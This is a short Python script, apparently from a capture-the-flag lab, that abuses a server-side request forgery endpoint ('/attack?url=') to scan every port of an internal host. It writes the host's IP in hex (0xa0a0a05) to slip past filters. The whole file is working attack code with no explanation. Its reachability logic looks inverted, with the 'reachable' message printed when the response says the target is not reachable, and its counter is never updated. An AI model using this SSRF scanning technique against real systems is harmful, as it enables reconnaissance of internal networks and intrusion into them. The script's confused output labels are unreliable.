#!/usr/bin/env python

import requests

s = requests.Session()

t = []
j = 0
for i in range(1, 65536):
   r = s.get(f"http://10.10.214.67:8000/attack?url=http%3A%2F%2F0xa0a0a05%3A{i}")
   print(r.text)
   if "Target is not reachable!" in r.text:
       print(f"{i} is reachable, sum is {j}")
       t.append(f"Port {i}, {r.text}")
   else: 
       print (f"{i} not reachable")
print(t)
